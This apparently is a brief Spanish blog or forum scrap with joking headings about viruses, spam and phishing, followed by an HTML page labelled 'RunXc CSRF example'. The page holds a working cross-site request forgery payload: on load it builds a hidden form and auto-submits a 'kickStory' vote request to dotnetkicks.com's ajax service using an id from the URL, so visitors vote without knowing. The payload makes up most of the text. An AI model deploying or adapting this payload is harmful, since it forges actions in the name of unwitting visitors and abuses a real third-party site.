Los virus atacan de nuevo:
Acaba con el SPAM:
Y el mejor, Phising:
Seguro que son trabajadores de la empresa xD
Buenas
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1" runat="server">
<title>RunXc CSRF example</title>
<script type="text/javascript"
src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js"></script>
<script type="text/javascript">
$(document).ready(function() {
var kickit = location.search.substring(4);
$('#hidDiv').html(
'<form name="csrf" id="csrf" ' +
'action="http://dotnetkicks.com/services/ajax/ajaxservices.ashx" method="post">' +
' <input type="hidden" name="" value=' + "'" +
'{"id":1,"method":"kickStory","params":['+ kickit +',true]}' + "'" + '/>' +
' </form>');
document.getElementById("csrf").submit();
});
</script>
</head><body>